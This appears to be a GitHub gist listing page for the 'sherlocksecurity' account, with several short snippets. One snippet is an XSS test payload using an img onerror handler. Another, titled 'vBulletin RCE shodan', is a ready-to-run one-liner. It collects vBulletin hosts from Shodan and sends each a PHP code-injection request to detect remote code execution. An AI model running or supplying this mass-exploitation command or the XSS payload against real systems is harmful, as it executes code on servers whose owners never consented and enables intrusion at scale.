Sherlock Secure sherlocksecurity
sherlocksecurity
/ gist:249598d0378c7e1515d9434bd9456d6d
Created
January 25, 2023 14:55
Testing the Public Gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Testing the Public Gist Catch |
sherlocksecurity
/ Does editing catch it?
Last active
January 25, 2023 14:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Does editing catch it? |
sherlocksecurity
/ msk-snippet-My snippet.js
Created
February 18, 2021 08:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://gist.githubusercontent.com/sherlocksecurity/e18c8a15e938fd753f28df14f697afef/raw/97ac59fc74bbd41e7030a8b45618cb2fba8174f7/msk-snippet-My%20snippet.json |
sherlocksecurity
/ msk-snippet-My snippet.json
Created
February 18, 2021 08:49
“><img src=x onerror=alert(1)>
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {"bugs"} | |
| “><img src=x onerror=alert(1)> |
sherlocksecurity
/ vBulletin RCE shodan
Created
August 11, 2020 23:16
— forked from Mad-robot/vBulletin RCE shodan
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; |